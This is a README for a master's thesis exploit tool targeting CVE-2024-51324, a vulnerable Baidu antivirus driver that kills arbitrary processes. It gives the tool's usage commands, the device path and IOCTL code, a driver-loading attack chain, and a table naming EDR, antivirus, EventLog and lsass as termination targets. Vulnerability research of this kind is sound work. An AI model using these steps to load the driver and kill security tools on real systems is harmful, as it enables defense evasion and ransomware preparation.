Share
## https://sploitus.com/exploit?id=67F51425-1418-5182-A750-19B4712448F7
# CVE-2024-51324 β BYOVD: BdApiUtil64.sys Process Killer Β· Master's Thesis Research
[](https://nvd.nist.gov/vuln/detail/CVE-2024-51324)
[](https://github.com/devianntsec)
[](LICENSE)
[](https://github.com/devianntsec)
[-orange)](https://nvd.nist.gov/vuln/detail/CVE-2024-51324)
> **Bring Your Own Vulnerable Driver (BYOVD) β Baidu Antivirus `BdApiUtil64.sys`**
> Arbitrary process termination from any user context via exposed IOCTL
> Affected: BdApiUtil64.sys (Baidu Antivirus 7.0.0.51176 and earlier)
---
Loading the vulnerable driver into kernel (LOADER mode)
## Description
This repository contains my **Master's Thesis research** on **CVE-2024-51324**, a High-severity (CVSS 7.8) **Bring Your Own Vulnerable Driver (BYOVD)** vulnerability in Baidu Antivirus's kernel driver `BdApiUtil64.sys`.
The vulnerability originates from an **improperly access-controlled IOCTL handler** (`0x800024B4`) exposed by the driver's device object `\\.\BdApiUtil`. Any unprivileged user-mode process can open the device and send a process identifier as input, causing the kernel driver to terminate that process β including protected, elevated, or security-sensitive ones β without any privilege check.
### My Contribution
| Aspect | Description |
|--------|-------------|
| **Four operation modes** | LOADER, KILLER, SCANNER, and CLEANUP β complete lifecycle management |
| **Automated driver search** | Multi-path driver discovery with SHA-256 hash verification |
| **Empirical driver analysis** | IOCTL reverse engineering, device path analysis, and access control audit |
| **Post-exploitation documentation** | Defense evasion and security tool termination scenarios |
| **Academic documentation** | Root cause, driver analysis, and vulnerability timeline |
---
## Repository Structure
```
CVE-2024-51324-BYOVD-Masters-Thesis/
βββ README.md # This file
βββ LICENSE # MIT License
β
βββ drivers/ # Vulnerable driver location
β βββ BdApiUtil64.sys # Driver (not distributed)
β
βββ exploit/
β βββ exploit-explanation.md # Exploit usage documentation
β βββ byovd_killer.py # Main exploit β 4 operational modes
β
βββ docs/
βββ screenshots/ # Exploitation demonstrations
β βββ 01-byovd-scan.png
β βββ 02-byovd-scan-target.png
β βββ 03-byovd-load.png
β βββ 04-byovd-load-custom.png
β βββ 05-kill-name.gif
β βββ 06-kill-pid.gif
β βββ 07-kill-limit.gif
β βββ 08-dry-run.gif
β βββ 09-byovd-cleanup.png
β
βββ analysis/
βββ 01-root-cause.md # Vulnerability root cause analysis
βββ 02-driver-analysis.md # IOCTL reverse engineering & empirical findings
βββ 03-timeline.md # CVE timeline
```
---
## Quick Start
### Prerequisites
- Windows 10/11 (any build)
- Python 3.6+
- `BdApiUtil64.sys` β the vulnerable driver binary (obtain from Baidu Antivirus 7.x installation)
- Administrator account (for LOADER and CLEANUP modes only)
- Standard user account sufficient for KILLER mode once driver is loaded
### Step 1 β Scan the system
```bash
python exploit/byovd_killer.py --scan
python exploit/byovd_killer.py --scan --target lsass.exe
```
### Step 2 β Load the driver (Admin required)
```bash
# Default driver in drivers/ folder
python exploit/byovd_killer.py --load
# Custom driver path
python exploit/byovd_killer.py --load --driver C:\path\to\BdApiUtil64.sys
# Custom service name
python exploit/byovd_killer.py --load --service-name MyService
```
### Step 3 β Kill processes (No admin required)
```bash
# Kill all instances of a process by name
python exploit/byovd_killer.py --kill notepad.exe
# Kill specific PID
python exploit/byovd_killer.py --pid 1234
# Limit to 2 instances
python exploit/byovd_killer.py --kill notepad.exe --max-instances 2
# Dry run (simulate without killing)
python exploit/byovd_killer.py --kill notepad.exe --dry-run
```
### Step 4 β Cleanup (Admin required)
```bash
python exploit/byovd_killer.py --cleanup
python exploit/byovd_killer.py --cleanup --service-name MyService
```
---
## Operational Modes
| Mode | Command | Privileges | Description |
|------|---------|------------|-------------|
| **SCANNER** | `--scan` | Any user | System and driver status information |
| **LOADER** | `--load` | Admin | Load driver into kernel via service creation |
| **KILLER** | `--kill` / `--pid` | Any user | Terminate processes via IOCTL |
| **CLEANUP** | `--cleanup` | Admin | Stop and delete driver service |
---
## Demonstrations
### SCANNER Mode β System Information

### SCANNER Mode β Target Process Search

### LOADER Mode β Loading Driver

### LOADER Mode β Custom Path and Service Name

### KILLER Mode β Kill by Process Name

### KILLER Mode β Kill by PID

### KILLER Mode β Limit Instances

### KILLER Mode β Dry Run (Simulation)

### CLEANUP Mode β Unload Driver

---
## Technical Overview
### Vulnerability Root Cause
`BdApiUtil64.sys` registers a device object accessible at `\\.\BdApiUtil`. Its `IRP_MJ_DEVICE_CONTROL` handler accepts IOCTL code `0x800024B4` with a 4-byte input buffer containing a target process ID. The handler calls `ZwTerminateProcess` on the supplied PID **without any security descriptor check, privilege verification, or caller integrity level validation**.
```
User-mode (any integrity level)
β
ββ CreateFile("\\.\BdApiUtil", GENERIC_READ | GENERIC_WRITE)
β ββ Succeeds for any user β no DACL restriction on device object
β
ββ DeviceIoControl(hDevice, 0x800024B4, &pid, 4, ...)
ββ Kernel driver calls ZwTerminateProcess(pid) unconditionally
```
### Why It Matters: BYOVD Context
The BYOVD technique allows a threat actor to bring a legitimately signed (but vulnerable) driver onto a target system and load it via a kernel service. Once loaded, the driver's exposed attack surface is accessible to any user. In this case:
- The driver is signed by Baidu, passing driver signature enforcement
- Loading requires administrator once; exploitation requires no further elevation
- Security products, EDR agents, and protected processes become terminable
### Attack Chain
```
1. [ADMIN] Drop BdApiUtil64.sys to disk
2. [ADMIN] Create kernel service β sc create ... type= kernel
3. [ADMIN] Start service β driver loaded into kernel
4. [ANY USER] Open \\.\BdApiUtil device handle
5. [ANY USER] Send IOCTL 0x800024B4 with target PID
6. [KERNEL] ZwTerminateProcess() called β process terminated
```
---
## Empirical Analysis
IOCTL reverse engineering was performed on `BdApiUtil64.sys` SHA-256 `47EC51B5F0EDE1E70BD66F3F0152F9EB536D534565DBB7FCC3A05F542DBE4428`.
| Observable | Value | Notes |
|-----------|-------|-------|
| Device name | `\\.\BdApiUtil` | Accessible to any user |
| IOCTL code | `0x800024B4` | Method: METHOD_NEITHER |
| Input size | 4 bytes | DWORD process ID |
| Output size | 4 bytes | Status code |
| Access check | None | No privilege validation |
| Driver signature | Valid (Baidu) | Passes KMCS |
Full analysis documented in [`docs/analysis/02-driver-analysis.md`](docs/analysis/02-driver-analysis.md).
---
## Post-Exploitation Scenarios
| Scenario | Target | Impact |
|----------|--------|--------|
| EDR/AV termination | `MsMpEng.exe`, `SentinelAgent.exe` | Defense evasion |
| Audit log disruption | `EventLog` service | Tamper with forensics |
| Protected process bypass | `lsass.exe` | Credential access facilitator |
| Ransomware defense evasion | Security agents | Pre-encryption preparation |
---
## Technical Documentation
| Document | Description |
|----------|-------------|
| [Root Cause Analysis](docs/analysis/01-root-cause.md) | Missing access control in IRP_MJ_DEVICE_CONTROL handler |
| [Driver Analysis](docs/analysis/02-driver-analysis.md) | IOCTL reverse engineering and empirical testing results |
| [CVE Timeline](docs/analysis/03-timeline.md) | Discovery, disclosure, and patch chronology |
---
## Academic Context
This research is part of my **Master's Thesis in Cybersecurity** (UCAM β Campus Internacional de Ciberseguridad), analyzing N-Day vulnerabilities across multiple environments.
This CVE represents the **Windows kernel driver / BYOVD** vector within the thesis, demonstrating:
- Kernel driver attack surface analysis via IOCTL enumeration
- Bring Your Own Vulnerable Driver exploitation methodology
- Privilege boundary violation through missing access control checks
- Defense evasion techniques leveraged by real-world threat actors
**Keywords:** `BYOVD` Β· `Kernel Driver` Β· `IOCTL` Β· `Process Termination` Β· `Defense Evasion` Β· `CVE-2024-51324`
---
## Author
**Annais Molina (devianntsec)** β Master's Student in Cybersecurity
[](https://github.com/devianntsec)
[](https://linkedin.com/in/annais-molina-fuentes)
[](mailto:me@deviannt.com)
---
## Acknowledgments
- [**NVD / NIST**](https://nvd.nist.gov/vuln/detail/CVE-2024-51324) β CVE record and scoring
- [**EDR Telemetry Project**](https://github.com/tsale/EDR-Telemetry) β BYOVD driver database reference
- **loldrivers.io** β Community-maintained vulnerable driver index
---
## License
MIT License β see [LICENSE](LICENSE)
---
## Legal Disclaimer
This repository is provided **for educational and security research purposes only**, as part of an academic Master's Thesis. All testing was performed on isolated virtual machines with no network exposure. The vulnerable driver (`BdApiUtil64.sys`) is not distributed in this repository β it must be obtained independently. Use only on systems you own or have explicit written authorization to test. Unauthorized use against systems is illegal and may result in criminal prosecution.
Β© 2026 Annais Molina Β· Master's Thesis in Cybersecurity
UCAM Universidad CatΓ³lica San Antonio de Murcia Β· Campus Internacional de Ciberseguridad